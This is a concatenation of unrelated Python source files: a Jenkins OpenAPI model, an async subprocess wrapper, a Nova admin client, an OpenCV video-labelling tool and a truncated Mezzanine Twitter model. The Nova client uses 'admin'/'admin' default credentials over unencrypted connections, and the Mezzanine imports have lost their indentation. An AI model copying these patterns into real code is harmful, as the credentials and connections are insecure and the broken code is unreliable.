    print(Solution().findMedianSortedArrays3([1, 2], [3, 4]))  # output: 2.5
|
<gh_stars>0
# coding: utf-8
from datetime import date, datetime
from typing import List, Dict, Type
from openapi_server.models.base_model_ import Model
from openapi_server.models.all_view import AllView
from openapi_server.models.free_style_project import FreeStyleProject
from openapi_server.models.hudsonassigned_labels import HudsonassignedLabels
from openapi_server.models.unlabeled_load_statistics import UnlabeledLoadStatistics
from openapi_server import util
class Hudson(Model):
    """NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).
    Do not edit the class manually.
    """
    def __init__(self, _class: str=None, assigned_labels: List[HudsonassignedLabels]=None, mode: str=None, node_description: str=None, node_name: str=None, num_executors: int=None, description: str=None, jobs: List[FreeStyleProject]=None, primary_view: AllView=None, quieting_down: bool=None, slave_agent_port: int=None, unlabeled_load: UnlabeledLoadStatistics=None, use_crumbs: bool=None, use_security: bool=None, views: List[AllView]=None):
        """Hudson - a model defined in OpenAPI
        :param _class: The _class of this Hudson.
        :param assigned_labels: The assigned_labels of this Hudson.
        :param mode: The mode of this Hudson.
        :param node_description: The node_description of this Hudson.
        :param node_name: The node_name of this Hudson.
        :param num_executors: The num_executors of this Hudson.
        :param description: The description of this Hudson.
        :param jobs: The jobs of this Hudson.
        :param primary_view: The primary_view of this Hudson.
        :param quieting_down: The quieting_down of this Hudson.
        :param slave_agent_port: The slave_agent_port of this Hudson.
        :param unlabeled_load: The unlabeled_load of this Hudson.
        :param use_crumbs: The use_crumbs of this Hudson.
        :param use_security: The use_security of this Hudson.
        :param views: The views of this Hudson.
        """
        # Attribute name -> declared OpenAPI type; used by the serializer.
        self.openapi_types = {
            '_class': str,
            'assigned_labels': List[HudsonassignedLabels],
            'mode': str,
            'node_description': str,
            'node_name': str,
            'num_executors': int,
            'description': str,
            'jobs': List[FreeStyleProject],
            'primary_view': AllView,
            'quieting_down': bool,
            'slave_agent_port': int,
            'unlabeled_load': UnlabeledLoadStatistics,
            'use_crumbs': bool,
            'use_security': bool,
            'views': List[AllView]
        }
        # Python attribute name -> JSON field name in the wire format.
        self.attribute_map = {
            '_class': '_class',
            'assigned_labels': 'assignedLabels',
            'mode': 'mode',
            'node_description': 'nodeDescription',
            'node_name': 'nodeName',
            'num_executors': 'numExecutors',
            'description': 'description',
            'jobs': 'jobs',
            'primary_view': 'primaryView',
            'quieting_down': 'quietingDown',
            'slave_agent_port': 'slaveAgentPort',
            'unlabeled_load': 'unlabeledLoad',
            'use_crumbs': 'useCrumbs',
            'use_security': 'useSecurity',
            'views': 'views'
        }
        # `self.__class` is name-mangled to `_Hudson__class`; the `_class`
        # property below uses the same mangled name, so this is consistent
        # (and deliberately does not touch the builtin `self.__class__`).
        self.__class = _class
        self._assigned_labels = assigned_labels
        self._mode = mode
        self._node_description = node_description
        self._node_name = node_name
        self._num_executors = num_executors
        self._description = description
        self._jobs = jobs
        self._primary_view = primary_view
        self._quieting_down = quieting_down
        self._slave_agent_port = slave_agent_port
        self._unlabeled_load = unlabeled_load
        self._use_crumbs = use_crumbs
        self._use_security = use_security
        self._views = views
    @classmethod
    def from_dict(cls, dikt: dict) -> 'Hudson':
        """Returns the dict as a model
        :param dikt: A dict.
        :return: The Hudson of this Hudson.
        """
        return util.deserialize_model(dikt, cls)
    @property
    def _class(self):
        """Gets the _class of this Hudson.
        :return: The _class of this Hudson.
        :rtype: str
        """
        return self.__class
    @_class.setter
    def _class(self, _class):
        """Sets the _class of this Hudson.
        :param _class: The _class of this Hudson.
        :type _class: str
        """
        self.__class = _class
    @property
    def assigned_labels(self):
        """Gets the assigned_labels of this Hudson.
        :return: The assigned_labels of this Hudson.
        :rtype: List[HudsonassignedLabels]
        """
        return self._assigned_labels
    @assigned_labels.setter
    def assigned_labels(self, assigned_labels):
        """Sets the assigned_labels of this Hudson.
        :param assigned_labels: The assigned_labels of this Hudson.
        :type assigned_labels: List[HudsonassignedLabels]
        """
        self._assigned_labels = assigned_labels
    @property
    def mode(self):
        """Gets the mode of this Hudson.
        :return: The mode of this Hudson.
        :rtype: str
        """
        return self._mode
    @mode.setter
    def mode(self, mode):
        """Sets the mode of this Hudson.
        :param mode: The mode of this Hudson.
        :type mode: str
        """
        self._mode = mode
    @property
    def node_description(self):
        """Gets the node_description of this Hudson.
        :return: The node_description of this Hudson.
        :rtype: str
        """
        return self._node_description
    @node_description.setter
    def node_description(self, node_description):
        """Sets the node_description of this Hudson.
        :param node_description: The node_description of this Hudson.
        :type node_description: str
        """
        self._node_description = node_description
    @property
    def node_name(self):
        """Gets the node_name of this Hudson.
        :return: The node_name of this Hudson.
        :rtype: str
        """
        return self._node_name
    @node_name.setter
    def node_name(self, node_name):
        """Sets the node_name of this Hudson.
        :param node_name: The node_name of this Hudson.
        :type node_name: str
        """
        self._node_name = node_name
    @property
    def num_executors(self):
        """Gets the num_executors of this Hudson.
        :return: The num_executors of this Hudson.
        :rtype: int
        """
        return self._num_executors
    @num_executors.setter
    def num_executors(self, num_executors):
        """Sets the num_executors of this Hudson.
        :param num_executors: The num_executors of this Hudson.
        :type num_executors: int
        """
        self._num_executors = num_executors
    @property
    def description(self):
        """Gets the description of this Hudson.
        :return: The description of this Hudson.
        :rtype: str
        """
        return self._description
    @description.setter
    def description(self, description):
        """Sets the description of this Hudson.
        :param description: The description of this Hudson.
        :type description: str
        """
        self._description = description
    @property
    def jobs(self):
        """Gets the jobs of this Hudson.
        :return: The jobs of this Hudson.
        :rtype: List[FreeStyleProject]
        """
        return self._jobs
    @jobs.setter
    def jobs(self, jobs):
        """Sets the jobs of this Hudson.
        :param jobs: The jobs of this Hudson.
        :type jobs: List[FreeStyleProject]
        """
        self._jobs = jobs
    @property
    def primary_view(self):
        """Gets the primary_view of this Hudson.
        :return: The primary_view of this Hudson.
        :rtype: AllView
        """
        return self._primary_view
    @primary_view.setter
    def primary_view(self, primary_view):
        """Sets the primary_view of this Hudson.
        :param primary_view: The primary_view of this Hudson.
        :type primary_view: AllView
        """
        self._primary_view = primary_view
    @property
    def quieting_down(self):
        """Gets the quieting_down of this Hudson.
        :return: The quieting_down of this Hudson.
        :rtype: bool
        """
        return self._quieting_down
    @quieting_down.setter
    def quieting_down(self, quieting_down):
        """Sets the quieting_down of this Hudson.
        :param quieting_down: The quieting_down of this Hudson.
        :type quieting_down: bool
        """
        self._quieting_down = quieting_down
    @property
    def slave_agent_port(self):
        """Gets the slave_agent_port of this Hudson.
        :return: The slave_agent_port of this Hudson.
        :rtype: int
        """
        return self._slave_agent_port
    @slave_agent_port.setter
    def slave_agent_port(self, slave_agent_port):
        """Sets the slave_agent_port of this Hudson.
        :param slave_agent_port: The slave_agent_port of this Hudson.
        :type slave_agent_port: int
        """
        self._slave_agent_port = slave_agent_port
    @property
    def unlabeled_load(self):
        """Gets the unlabeled_load of this Hudson.
        :return: The unlabeled_load of this Hudson.
        :rtype: UnlabeledLoadStatistics
        """
        return self._unlabeled_load
    @unlabeled_load.setter
    def unlabeled_load(self, unlabeled_load):
        """Sets the unlabeled_load of this Hudson.
        :param unlabeled_load: The unlabeled_load of this Hudson.
        :type unlabeled_load: UnlabeledLoadStatistics
        """
        self._unlabeled_load = unlabeled_load
    @property
    def use_crumbs(self):
        """Gets the use_crumbs of this Hudson.
        :return: The use_crumbs of this Hudson.
        :rtype: bool
        """
        return self._use_crumbs
    @use_crumbs.setter
    def use_crumbs(self, use_crumbs):
        """Sets the use_crumbs of this Hudson.
        :param use_crumbs: The use_crumbs of this Hudson.
        :type use_crumbs: bool
        """
        self._use_crumbs = use_crumbs
    @property
    def use_security(self):
        """Gets the use_security of this Hudson.
        :return: The use_security of this Hudson.
        :rtype: bool
        """
        return self._use_security
    @use_security.setter
    def use_security(self, use_security):
        """Sets the use_security of this Hudson.
        :param use_security: The use_security of this Hudson.
        :type use_security: bool
        """
        self._use_security = use_security
    @property
    def views(self):
        """Gets the views of this Hudson.
        :return: The views of this Hudson.
        :rtype: List[AllView]
        """
        return self._views
    @views.setter
    def views(self, views):
        """Sets the views of this Hudson.
        :param views: The views of this Hudson.
        :type views: List[AllView]
        """
        self._views = views
|
# Cross-platform asynchronous version of subprocess.Popen
#
# Copyright (c) 2011-2012
# <NAME>
# anatoly techtonik
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
'''
Provides an asynchronous wrapper around the subprocess module.
The solution is inspired by snippet <NAME> posted at StackOverflow
at the following URL: http://stackoverflow.com/questions/375427/
-------------
Limitations
-------------
[ ] Popen arguments stdin/stdout/stderr can only be PIPE or None
[x] calling process.stdin.close() causes exception
IOError: close() called during concurrent operation on the same file object.
'''
__version__ = '0.5dev'
from subprocess import PIPE, Popen
from threading import Thread, Lock
from warnings import warn
from collections import deque
# --- debugging helper ---
def echo(msg):
    """Write *msg* straight to stderr and flush (debugging helper)."""
    import sys
    stream = sys.stderr
    stream.write(msg)
    stream.flush()
# --- functions that run in separate threads ---
def threadedOutputQueue(pipe, queue, lock):
    '''
    Called from a worker thread: read lines from *pipe* and append them to
    *queue* (a deque shared with the main thread) under *lock* until EOF.

    The pipe is always closed on exit; thread termination is driven by the
    pipe hitting EOF or raising once the child process ends.
    '''
    try:
        while True:
            chunk = pipe.readline()
            if not chunk:
                # hit end-of-file
                break
            # `with lock` guarantees release even if append raises; the old
            # acquire()/release() pair could leave the lock held forever.
            with lock:
                queue.append(chunk)
    except Exception:
        # Best effort: a broken pipe simply ends the reader thread.  The
        # previous bare `except:` also swallowed SystemExit.
        pass
    finally:
        pipe.close()
def threadedInputQueue(pipe, queue, lock):
    '''
    Called from a worker thread: drain chunks from *queue* and write them to
    *pipe* until the pipe is closed (writing then raises, ending the loop).

    NOTE(review): this is a busy-wait — it spins re-acquiring the lock even
    when the queue is empty (the known 100% CPU limitation); a Condition
    would avoid the burn.
    '''
    try:
        while True:
            # BUGFIX: `with lock` releases the lock even when pipe.write()
            # raises.  Previously an exception here jumped to the handler
            # with the lock still held, permanently deadlocking
            # StdinQueue.write()/close() in the main thread.
            with lock:
                while len(queue) > 0:
                    chunk = queue.popleft()
                    pipe.write(chunk)
                    pipe.flush()
    except Exception:
        pass
    finally:
        pipe.close()
# --/ functions that run in separate threads ---
class StdinQueue(object):
    '''
    Thread-safe stdin wrapper: spins off a queue-management thread and
    exposes write()/close() wrappers around the underlying pipe.

    [ ] find out which methods are not thread safe
    '''
    def __init__(self, stdin):
        self.stdin = stdin
        # Pending chunks waiting to be written to stdin by the worker thread.
        self._queue = deque()
        # Guards all access to the queue and the underlying pipe.
        self._lock = Lock()
        # Daemon worker that drains the queue into the pipe.
        writer = Thread(target=threadedInputQueue,
                        args=(self.stdin, self._queue, self._lock))
        writer.daemon = True
        writer.start()
        self._thread = writer

    def write(self, data):
        """Queue *data* for the worker thread; empty data is ignored."""
        if data:
            # enqueue data
            self._lock.acquire()
            self._queue.append(data)
            self._lock.release()

    def close(self):
        """Close the pipe; the worker thread stops once its pipe is closed."""
        self._lock.acquire()
        self.stdin.close()
        self._lock.release()
class AsyncPopen(Popen):
    '''
    Asynchronous wrapper around subprocess.Popen.

    Do not directly access AsyncPopen.stdout, AsyncPopen.stderr, or
    AsyncPopen.stdin. Instead, use the (non-blocking asynchronous)
    AsyncPopen.asyncomm() method.

    This reads entire lines from stdout and stderr at once.

    Inspired by snippet of <NAME>, found at the following URL:
    http://stackoverflow.com/questions/375427/
    '''
    def __init__(self, args, bufsize=0, executable=None,
                 stdin=None, stdout=None, stderr=None,
                 preexec_fn=None, close_fds=False, shell=False,
                 cwd=None, env=None, universal_newlines=False,
                 startupinfo=None, creationflags=0):
        '''
        Creates a new AsyncPopen instance.

        All of the arguments are the same as for subprocess.Popen with several
        exceptions:

        * stdin, stdout, and stderr can only be None or PIPE.

        In Python 3, all data read from stdout and stderr will be treated as
        the "bytes" built-in type; it is up to the user to convert this type
        to the appropriate character type, if desired.
        '''
        self._stdin = None
        self._stdout = None
        self._stderr = None
        # Check for use of stdin, stdout, stderr values other than NONE, PIPE.
        # Invalid values are warned about and silently downgraded to None.
        if stdin not in (None, PIPE):
            warn("stdin must be either None or subprocess.PIPE.")
        else:
            self._stdin = stdin
        if stdout not in (None, PIPE):
            warn("stdout must be either None or subprocess.PIPE.")
        else:
            self._stdout = stdout
        if stderr not in (None, PIPE):
            warn("stderr must be either None or subprocess.PIPE.")
        else:
            self._stderr = stderr
        # Inherit base class behavior.
        super(AsyncPopen, self).__init__(args, bufsize=bufsize,
                                         executable=executable,
                                         stdin=self._stdin,
                                         stdout=self._stdout,
                                         stderr=self._stderr,
                                         preexec_fn=preexec_fn,
                                         close_fds=close_fds,
                                         shell=shell, cwd=cwd, env=env,
                                         universal_newlines=universal_newlines,
                                         startupinfo=startupinfo,
                                         creationflags=creationflags)
        # Start the I/O polling threads.
        if self._stdout:
            # Queue of data read from stdout + its lock and reader thread.
            self.stdout_queue = deque()
            self.stdout_lock = Lock()
            self.stdout_thread = Thread(target=threadedOutputQueue,
                                        args=(self.stdout, self.stdout_queue,
                                              self.stdout_lock))
            self.stdout_thread.daemon = True
            self.stdout_thread.start()
        if self._stderr:
            # Queue of data read from stderr + its lock and reader thread.
            self.stderr_queue = deque()
            self.stderr_lock = Lock()
            self.stderr_thread = Thread(target=threadedOutputQueue,
                                        args=(self.stderr, self.stderr_queue,
                                              self.stderr_lock))
            self.stderr_thread.daemon = True
            self.stderr_thread.start()
        if self._stdin:
            # Replace the raw pipe with the thread-safe queueing wrapper.
            self.stdin = StdinQueue(self.stdin)

    def communicate(self, input=None):
        '''
        Blocking drop-in for Popen.communicate(): optionally send *input*,
        then collect all output until the child exits.  Returns the usual
        (stdoutdata, stderrdata) tuple (None for streams not piped).
        '''
        if self._stdin:
            if input:
                self.stdin.write(input)
            # close stdin pipe for the children process. If
            # it is blocked waiting for input, this will make
            # it receive EOF to unblock.
            self.stdin.close()
        stdoutdata = b'' if self._stdout else None
        stderrdata = b'' if self._stderr else None
        # `is None` instead of `== None`: identity is the correct idiom
        # (and avoids any custom __eq__).
        while self.poll() is None:
            # [ ] this causes 100% CPU load
            (out, err) = self.asyncomm()
            if out:
                stdoutdata += out
            if err:
                stderrdata += err
        # wait until threads terminate to empty queues
        if self._stdout:
            self.stdout_thread.join()
        if self._stderr:
            self.stderr_thread.join()
        # read out everything
        (out, err) = self.asyncomm()
        if out:
            stdoutdata += out
        if err:
            stderrdata += err
        return (stdoutdata, stderrdata)

    def asyncomm(self, input=None):
        '''
        Interact with process: Enqueue data to be sent to stdin. Return data
        read from stdout and stderr as a tuple (stdoutdata, stderrdata). Do
        NOT wait for process to terminate.
        '''
        if self._stdin and input:
            self.stdin.write(input)
        stdoutdata = None
        stderrdata = None
        if self._stdout:
            # get data
            data = b""  # ([ ] check b'' in pre-Python 2.7)
            self.stdout_lock.acquire()
            try:
                while len(self.stdout_queue) > 0:
                    data += self.stdout_queue.popleft()
            except:
                self.stdout_lock.release()
                raise
            self.stdout_lock.release()
            # [ ] detect closed pipe to return None
            stdoutdata = data
        if self._stderr:
            # get data
            data = b""  # ([ ] check b'' in pre-Python 2.7)
            self.stderr_lock.acquire()
            try:
                while len(self.stderr_queue) > 0:
                    data += self.stderr_queue.popleft()
            except:
                self.stderr_lock.release()
                raise
            self.stderr_lock.release()
            # [ ] detect closed pipe to return None
            stderrdata = data
        return (stdoutdata, stderrdata)
|
<gh_stars>0
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2010 Anso Labs, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Nova User API client library.
"""
import boto
from boto.ec2.regioninfo import RegionInfo
import base64
class UserInfo(object):
    """Information about a Nova user.

    Populated by boto's SAX response parser through endElement(); carries
    the username, accesskey and secretkey fields, plus an optional ``file``
    payload containing a zip with the X509 cert & rc file.
    """

    def __init__(self, connection=None, username=None, endpoint=None):
        self.connection = connection
        self.username = username
        self.endpoint = endpoint

    def __repr__(self):
        return 'UserInfo:%s' % self.username

    def startElement(self, name, attrs, connection):
        # No nested XML elements to handle.
        return None

    def endElement(self, name, value, connection):
        # Map leaf XML elements onto attributes; `file` arrives base64-encoded.
        if name == 'username':
            self.username = str(value)
        elif name == 'file':
            self.file = base64.b64decode(str(value))
        elif name == 'accesskey':
            self.accesskey = str(value)
        elif name == 'secretkey':
            self.secretkey = str(value)
class NovaAdminClient(object):
    """Admin client for the Nova EC2-style API (port 8773, /services/Admin)."""

    def __init__(self, clc_ip='127.0.0.1', region='nova', access_key='admin',
                 secret_key='admin', **kwargs):
        self.clc_ip = clc_ip
        self.region = region
        self.access = access_key
        self.secret = secret_key
        # Admin operations go through the /services/Admin path.
        self.apiconn = boto.connect_ec2(aws_access_key_id=access_key,
                                        aws_secret_access_key=secret_key,
                                        is_secure=False,
                                        region=RegionInfo(None, region, clc_ip),
                                        port=8773,
                                        path='/services/Admin',
                                        **kwargs)
        self.apiconn.APIVersion = 'nova'

    def connection_for(self, username, **kwargs):
        """
        Returns a boto ec2 connection for the given username.
        """
        user = self.get_user(username)
        return boto.connect_ec2(
            aws_access_key_id=user.accesskey,
            aws_secret_access_key=user.secretkey,
            is_secure=False,
            region=RegionInfo(None, self.region, self.clc_ip),
            port=8773,
            path='/services/Cloud',
            **kwargs
        )

    def get_users(self):
        """ grabs the list of all users """
        return self.apiconn.get_list('DescribeUsers', {}, (['item', UserInfo]))

    def get_user(self, name):
        """ grab a single user by name; returns None when unknown """
        user = self.apiconn.get_object('DescribeUser', {'Name': name}, UserInfo)
        # `is not None` instead of `!= None`: identity comparison is the
        # correct idiom and avoids invoking a custom __eq__.
        if user.username is not None:
            return user

    def has_user(self, username):
        """ determine if user exists """
        return self.get_user(username) is not None

    def create_user(self, username):
        """ creates a new user, returning the userinfo object with access/secret """
        return self.apiconn.get_object('RegisterUser', {'Name': username}, UserInfo)

    def delete_user(self, username):
        """ deletes a user """
        return self.apiconn.get_object('DeregisterUser', {'Name': username}, UserInfo)

    def get_zip(self, username):
        """ returns the content of a zip file containing novarc and access credentials. """
        return self.apiconn.get_object('GenerateX509ForUser', {'Name': username}, UserInfo).file
|
import cv2
import csv
import os
import keyboard
# Interactive labeling tool: plays each .mp4 under videoPath, tracks two
# regions of interest with KCF trackers, and appends per-frame rows
# (frame no., center x/y, center deltas, label) to label1.csv / label2.csv.
# Keys inside the video window: 'i'/'u' select the two ROIs, 'o' toggles
# recording, ESC stops playback. After playback (keyboard module): 'p'
# writes the CSVs, 's' advances to the next file, 'a' replays the current one.
videoPath = "C:\\Users\\82104\\Desktop\\차도가 아닌곳\\"
actionlist = os.listdir(videoPath)
action = 0   # index of the video file currently being processed
play = True  # True -> (re)open the current video before playback
while action < len(actionlist):
    v = actionlist[action].split(".")[-1]
    print(v)
    if v=='mp4':
        try:
            if play==True:
                flag = True  # guards against writing the CSVs twice per video
                cap = cv2.VideoCapture(videoPath + actionlist[action])
                success,frame = cap.read()
                label1_result = []
                total1 = []
                label2_result = []
                total2 = []
                # CSVs are opened in append mode so results accumulate
                # across videos.
                f1 = open(videoPath+'label1.csv','a',newline='')
                f2 = open(videoPath+'label2.csv','a',newline='')
                wr1 = csv.writer(f1)
                wr2 = csv.writer(f2)
                isRecording = True
                cnt = 0  # frame counter
                tracker = cv2.TrackerKCF_create()
                tracker1 = cv2.TrackerKCF_create()
            while cap.isOpened():
                cnt = cnt + 1
                success, frame = cap.read()
                # NOTE(review): the second read() below skips every other
                # frame, and resize() runs before `success` is checked, so
                # the end of the stream raises and lands in the except
                # handler — confirm this is intended.
                success1, frame = cap.read()
                frame = cv2.resize(frame, (640, 480))
                if not success:
                    break
                if success:
                    success, boxes = tracker.update(frame)
                    success1, boxes1 = tracker1.update(frame)
                    if isRecording:
                        # NOTE(review): by operator precedence this is
                        # x0 + w/2, not (x0 + w)/2 as used for the rows
                        # below — verify which center definition is wanted.
                        x = boxes[0] + boxes[2] / 2
                        y = boxes[1] + boxes[3] / 2
                        if x!=0 and y!=0:
                            total1.append((((boxes[0] + boxes[2]) / 2), ((boxes[1] + boxes[3]) / 2)))
                            label1_result.append((cnt,(int(boxes[0] + boxes[2]) / 2), (int(boxes[1] + boxes[3]) / 2),
                                                  abs((total1[len(total1) - 1][0] - total1[len(total1) - 2][0])),
                                                  abs((total1[len(total1) - 1][1] - total1[len(total1) - 2][1])),0))
                            # center x, center y, delta center x, delta center y, label
                            #print(label1_result)
                    p1 = (int(boxes[0]), int(boxes[1]))
                    p2 = (int(boxes[0] + boxes[2]), int(boxes[1] + boxes[3]))
                    cv2.rectangle(frame, p1, p2, (0, 255, 0), 2, 1)
                if success1:
                    if isRecording:
                        x = boxes1[0] + boxes1[2] / 2
                        y = boxes1[1] + boxes1[3] / 2
                        if x != 0 and y != 0:
                            total2.append((((boxes1[0] + boxes1[2]) / 2), ((boxes1[1] + boxes1[3]) / 2)))
                            label2_result.append((cnt,(int(boxes1[0] + boxes1[2]) / 2), (int(boxes1[1] + boxes1[3]) / 2),
                                                  abs((total2[len(total2) - 1][0] - total2[len(total2) - 2][0])),
                                                  abs((total2[len(total2) - 1][1] - total2[len(total2) - 2][1])),1))
                            # center x, center y, delta center x, delta center y, label
                            #print(boxes1)
                    p3 = (int(boxes1[0]), int(boxes1[1]))
                    p4 = (int(boxes1[0] + boxes1[2]), int(boxes1[1] + boxes1[3]))
                    cv2.rectangle(frame, p3, p4, (0, 0, 255), 2, 1)
                cv2.imshow('frame',frame)
                k = cv2.waitKey(60) & 0xFF
                if k==27:
                    # ESC ends playback for this video.
                    break
                if k == ord('i'):
                    # (Re)select ROI for the first tracker.
                    bbox = cv2.selectROI('Multitracker', frame)
                    result = tracker.init(frame, bbox)
                if k==ord('u'):
                    # (Re)select ROI for the second tracker.
                    bbox2 = cv2.selectROI('Multitracker', frame)
                    result = tracker1.init(frame, bbox2)
                if k==ord('o'):
                    # Toggle recording of label rows.
                    if isRecording==True:
                        isRecording = False
                    else:
                        isRecording = True
            # Playback done: wait for a keyboard command.
            play = False
            while True:
                if keyboard.is_pressed('p'):
                    # Persist collected rows once per video (flag).
                    if flag==True:
                        print(label1_result)
                        for i in range(len(label1_result)):
                            wr1.writerow([actionlist[action],label1_result[i][0], label1_result[i][1], label1_result[i][2], label1_result[i][3],
                                          label1_result[i][4],label1_result[i][5]])
                        for j in range(len(label2_result)):
                            wr2.writerow([actionlist[action],label2_result[j][0], label2_result[j][1], label2_result[j][2], label2_result[j][3],
                                          label2_result[j][4],label2_result[j][5]])
                        print('finish')
                        f1.close()
                        f2.close()
                        flag = False
                        cap.release()
                        cv2.destroyAllWindows()
                if keyboard.is_pressed('s'):
                    # Next video.
                    action = action + 1
                    play = True
                    f1.close()
                    f2.close()
                    cap.release()
                    cv2.destroyAllWindows()
                    break
                if keyboard.is_pressed('a'):
                    # Replay the current video.
                    play = True
                    f1.close()
                    f2.close()
                    cap.release()
                    cv2.destroyAllWindows()
                    break
        except Exception as e:
            # Playback errors (e.g. resize on a failed read at end of
            # stream) land here; the same keyboard menu is offered.
            print(str(e))
            while True:
                if keyboard.is_pressed('p'):
                    if flag == True:
                        print(label1_result)
                        for i in range(len(label1_result)):
                            wr1.writerow([actionlist[action], label1_result[i][0], label1_result[i][1], label1_result[i][2],
                                          label1_result[i][3],
                                          label1_result[i][4], label1_result[i][5]])
                        for j in range(len(label2_result)):
                            wr2.writerow([actionlist[action], label2_result[j][0], label2_result[j][1], label2_result[j][2],
                                          label2_result[j][3],
                                          label2_result[j][4], label2_result[j][5]])
                        print('finish')
                        f1.close()
                        f2.close()
                        flag = False
                        cap.release()
                        cv2.destroyAllWindows()
                if keyboard.is_pressed('s'):
                    action = action + 1
                    play = True
                    f1.close()
                    f2.close()
                    cap.release()
                    cv2.destroyAllWindows()
                    break
                if keyboard.is_pressed('a'):
                    play = True
                    f1.close()
                    f2.close()
                    cap.release()
                    cv2.destroyAllWindows()
                    break
    else:
        # Not an .mp4: skip this file.
        action = action + 1
from __future__ import unicode_literals
from future.builtins import str
from datetime import datetime, timedelta
import re
from time import timezone
try:
from urllib.parse import quote
except ImportError: # Python 2
from urllib import quote
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
from django.utils.html import urlize
from django.utils.timezone import get_default_timezone, make_aware
from django.utils.translation import ugettext_lazy as _
from requests_oauthlib import OAuth1
import requests
from mezzanine.conf import settings
from mezzanine.twitter import QUERY_TYPE_CHOICES, QUERY_TYPE_USER, \
QUERY_TYPE_LIST, QUERY_TYPE_SEARCH
from mezzanine.twitter.managers import TweetManager
# Patterns matching @mentions and #hashtags inside tweet text so they can
# be rewritten as links.
re_usernames = re.compile("@([0-9a-zA-Z+_]+)", re.IGNORECASE)
re_hashtags = re.compile("#([0-9a-zA-Z+_]+)", re.IGNORECASE)
# Replacement templates turning the captured tag/handle into twitter.com links.
replace_hashtags = "<a href=\"http://twitter.com/search?q=%23\\1\">#\\1</a>"
replace_usernames = "<a href=\"http://twitter.com/\\1\">@\\1</a>"
class TwitterQueryException(Exception):
    """Raised when a Twitter API query cannot be built or executed."""
    pass
@python_2_unicode_compatible
class Query(models.Model):
    """A Twitter query (user timeline, list, or search) to poll for tweets."""
    # Query kind: one of QUERY_TYPE_USER / QUERY_TYPE_LIST / QUERY_TYPE_SEARCH.
    type = models.CharField(_("Type"), choices=QUERY_TYPE_CHOICES,
                            max_length=10)
    value = models.CharField(_("Value"), max_length=140)
    # Cleared after a successful run so the scheduler stops polling.
    interested = models.BooleanField("Interested", default=True)
    class Meta:
        verbose_name = _("Twitter query")
        verbose_name_plural = _("Twitter queries")
        ordering = ("-id",)
    def __str__(self):
        return "%s: %s" % (self.get_type_display(), self.value)
    def run(self):
        """
        Request new tweets from the Twitter API.
        """
        # Map each query type to its Twitter REST API v1.1 endpoint URL.
        urls = {
            QUERY_TYPE_USER: ("https://api.twitter.com/1.1/statuses/"
                              "user_timeline.json?screen_name=%s"
                              "&include_rts=true" %
                              self.value.lstrip("@")),
            QUERY_TYPE_LIST: ("https://api.twitter.com/1.1/lists/statuses.json"
                              "?list_id=%s&include_rts=true" %
                              self.value.encode("utf-8")),
            QUERY_TYPE_SEARCH: "https://api.twitter.com/1.1/search/tweets.json"
                               "?q=%s" %
                               quote(self.value.encode("utf-8")),
        }
        try:
            url = urls[self.type]
        except KeyError:
            raise TwitterQueryException("Invalid query type: %s" % self.type)
        settings.use_editable()
        # OAuth1 credentials must all be configured, or we fall back to the
        # built-in defaults (only for the default query).
        auth_settings = (settings.TWITTER_CONSUMER_KEY,
                         settings.TWITTER_CONSUMER_SECRET,
                         settings.TWITTER_ACCESS_TOKEN_KEY,
                         settings.TWITTER_ACCESS_TOKEN_SECRET)
        if not all(auth_settings):
            from mezzanine.conf import registry
            if self.value == registry["TWITTER_DEFAULT_QUERY"]["default"]:
                # These are some read-only keys and secrets we use
                # for the default query (eg nothing has been configured)
                auth_settings = (
                    "<KEY>",
                    "<KEY>",
                    "<KEY>",
                    "<KEY>",
                )
            else:
                raise TwitterQueryException("Twitter OAuth settings missing")
        try:
            tweets = requests.get(url, auth=OAuth1(*auth_settings)).json()
        except Exception as e:
            raise TwitterQueryException("Error retrieving: %s" % e)
        # The API reports errors inside the JSON payload; surface the first.
        try:
            raise TwitterQueryException(tweets["errors"][0]["message"])
        except (IndexError, KeyError, TypeError):
            pass
        # Search responses nest the tweet list under "statuses".
        if self.type == "search":
            tweets = tweets["statuses"]
        for tweet_json in tweets:
            remote_id = str(tweet_json["id"])
            tweet, created = self.tweets.get_or_create(remote_id=remote_id)
            if not created:
                # Already stored; skip.
                continue
            if "retweeted_status" in tweet_json:
                # Record who retweeted, then process the original tweet.
                user = tweet_json['user']
                tweet.retweeter_user_name = user["screen_name"]
                tweet.retweeter_full_name = user["name"]
                tweet.retweeter_profile_image_url = user["profile_image_url"]
                tweet_json = tweet_json["retweeted_status"]
            if self.type == QUERY_TYPE_SEARCH:
                tweet.user_name = tweet_json['user']['screen_name']
                tweet.full_name = tweet_json['user']['name']
                tweet.profile_image_url = \
                    tweet_json['user']["profile_image_url"]
                date_format = "%a %b %d %H:%M:%S +0000 %Y"
            else:
                user = tweet_json["user"]
                tweet.user_name = user["screen_name"]
                tweet.full_name = user["name"]
                tweet.profile_image_url = user["profile_image_url"]
                date_format = "%a %b %d %H:%M:%S +0000 %Y"
            # Linkify URLs, @mentions and #hashtags in the tweet text.
            tweet.text = urlize(tweet_json["text"])
